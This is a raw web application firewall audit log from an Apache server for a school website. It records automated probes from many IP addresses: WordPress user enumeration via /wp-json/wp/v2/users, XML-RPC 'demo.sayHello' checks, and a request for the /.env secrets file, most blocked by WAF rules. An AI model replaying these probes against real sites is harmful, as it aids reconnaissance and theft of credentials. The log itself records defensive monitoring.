Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87888b7d-Z-- --94bd5d77-A-- [17/May/2025:07:38:57 +0700] aCfaoem4kjNN-hEbWjJAyAAAAEY 103.236.140.4 42940 103.236.140.4 8181 --94bd5d77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --94bd5d77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94bd5d77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442337180140 3395 (- - -) Stopwatch2: 1747442337180140 3395; combined=1445, p1=464, p2=938, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94bd5d77-Z-- --d2156140-A-- [17/May/2025:07:39:03 +0700] aCfapum4kjNN-hEbWjJAygAAAEg 103.236.140.4 42944 103.236.140.4 8181 --d2156140-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.99 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2156140-C-- demo.sayHello --d2156140-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2156140-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442342997258 6677 (- - -) Stopwatch2: 1747442342997258 6677; combined=4836, p1=598, p2=3998, p3=38, p4=43, p5=95, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2156140-Z-- --2af2a525-A-- [17/May/2025:07:39:37 +0700] aCfayXyxdQCiyU1ENFcnGAAAABM 103.236.140.4 42950 103.236.140.4 8181 --2af2a525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2af2a525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2af2a525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442377900352 3083 (- - -) Stopwatch2: 1747442377900352 3083; combined=1288, p1=411, p2=846, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2af2a525-Z-- --0fc5fe6e-A-- [17/May/2025:07:39:45 +0700] aCfa0em4kjNN-hEbWjJAzAAAAEo 103.236.140.4 42954 103.236.140.4 8181 --0fc5fe6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fc5fe6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fc5fe6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442385934757 2304 (- - -) Stopwatch2: 1747442385934757 2304; combined=1070, p1=344, p2=686, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fc5fe6e-Z-- --a9e2e151-A-- [17/May/2025:07:39:47 +0700] aCfa0-m4kjNN-hEbWjJAzQAAAEs 103.236.140.4 42956 103.236.140.4 8181 --a9e2e151-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9e2e151-C-- demo.sayHello --a9e2e151-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9e2e151-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442387179684 5678 (- - -) Stopwatch2: 1747442387179684 5678; combined=4169, p1=555, p2=3372, p3=32, p4=36, p5=102, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9e2e151-Z-- --0252424b-A-- [17/May/2025:07:39:48 +0700] aCfa1HyxdQCiyU1ENFcnGgAAABY 103.236.140.4 42958 103.236.140.4 8181 --0252424b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0252424b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0252424b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442388285171 2249 (- - -) Stopwatch2: 1747442388285171 2249; combined=1009, p1=376, p2=609, p3=0, p4=0, p5=24, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0252424b-Z-- --f9303b3f-A-- [17/May/2025:07:39:50 +0700] aCfa1gTOsBn9MSWb6WJt8QAAAIE 103.236.140.4 42966 103.236.140.4 8181 --f9303b3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9303b3f-C-- demo.sayHello --f9303b3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9303b3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442390698487 4653 (- - -) Stopwatch2: 1747442390698487 4653; combined=3629, p1=446, p2=2985, p3=24, p4=24, p5=89, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9303b3f-Z-- --be4c2b70-A-- [17/May/2025:07:39:54 +0700] aCfa2hKi5m5upc8uMd6h1AAAAMs 103.236.140.4 42968 103.236.140.4 8181 --be4c2b70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --be4c2b70-C-- demo.sayHello --be4c2b70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --be4c2b70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442394653636 6492 (- - -) Stopwatch2: 1747442394653636 6492; combined=4733, p1=615, p2=3879, p3=42, p4=41, p5=93, sr=85, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be4c2b70-Z-- --9a8c915a-A-- [17/May/2025:07:40:29 +0700] aCfa_em4kjNN-hEbWjJA0AAAAE8 103.236.140.4 42974 103.236.140.4 8181 --9a8c915a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.250.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.250.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; he-il; Redmi Note 4X Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.9.7-g Accept-Charset: utf-8 --9a8c915a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a8c915a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747442429605947 939 (- - -) Stopwatch2: 1747442429605947 939; combined=383, p1=327, p2=0, p3=0, p4=0, p5=55, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a8c915a-Z-- --267c3556-A-- [17/May/2025:07:41:31 +0700] aCfbO3yxdQCiyU1ENFcnIgAAABA 103.236.140.4 42990 103.236.140.4 8181 --267c3556-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --267c3556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --267c3556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442491218098 3144 (- - -) Stopwatch2: 1747442491218098 3144; combined=1405, p1=472, p2=905, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --267c3556-Z-- --e2ef0d07-A-- [17/May/2025:07:41:32 +0700] aCfbPATOsBn9MSWb6WJt8gAAAIA 103.236.140.4 42992 103.236.140.4 8181 --e2ef0d07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2ef0d07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2ef0d07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442492384177 3203 (- - -) Stopwatch2: 1747442492384177 3203; combined=1386, p1=468, p2=886, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2ef0d07-Z-- --8a8b8978-A-- [17/May/2025:07:41:33 +0700] aCfbPXyxdQCiyU1ENFcnJAAAAA8 103.236.140.4 42996 103.236.140.4 8181 --8a8b8978-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a8b8978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a8b8978-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442493871239 2044 (- - -) Stopwatch2: 1747442493871239 2044; combined=1044, p1=330, p2=687, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a8b8978-Z-- --cf34b814-A-- [17/May/2025:07:41:36 +0700] aCfbQBKi5m5upc8uMd6h1QAAAMw 103.236.140.4 43002 103.236.140.4 8181 --cf34b814-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cf34b814-C-- demo.sayHello --cf34b814-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf34b814-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442496417830 5023 (- - -) Stopwatch2: 1747442496417830 5023; combined=3843, p1=476, p2=3150, p3=28, p4=24, p5=95, sr=66, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf34b814-Z-- --685eb840-A-- [17/May/2025:07:41:38 +0700] aCfbQnyxdQCiyU1ENFcnJgAAABQ 103.236.140.4 43004 103.236.140.4 8181 --685eb840-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --685eb840-C-- demo.sayHello --685eb840-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --685eb840-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442498260736 6346 (- - -) Stopwatch2: 1747442498260736 6346; combined=4623, p1=623, p2=3762, p3=39, p4=42, p5=94, sr=92, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --685eb840-Z-- --cf6fa318-A-- [17/May/2025:07:41:39 +0700] aCfbQ3yxdQCiyU1ENFcnJwAAABU 103.236.140.4 43006 103.236.140.4 8181 --cf6fa318-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cf6fa318-C-- demo.sayHello --cf6fa318-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf6fa318-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442499464234 4759 (- - -) Stopwatch2: 1747442499464234 4759; combined=3665, p1=442, p2=3023, p3=24, p4=27, p5=88, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf6fa318-Z-- --5f3a9024-A-- [17/May/2025:07:41:40 +0700] aCfbRHyxdQCiyU1ENFcnKAAAABY 103.236.140.4 43010 103.236.140.4 8181 --5f3a9024-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f3a9024-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f3a9024-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442500063786 1876 (- - -) Stopwatch2: 1747442500063786 1876; combined=876, p1=303, p2=547, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f3a9024-Z-- --902d8f49-A-- [17/May/2025:07:41:46 +0700] aCfbSnyxdQCiyU1ENFcnKwAAAAI 103.236.140.4 43018 103.236.140.4 8181 --902d8f49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.180.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.180.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --902d8f49-C-- demo.sayHello --902d8f49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --902d8f49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 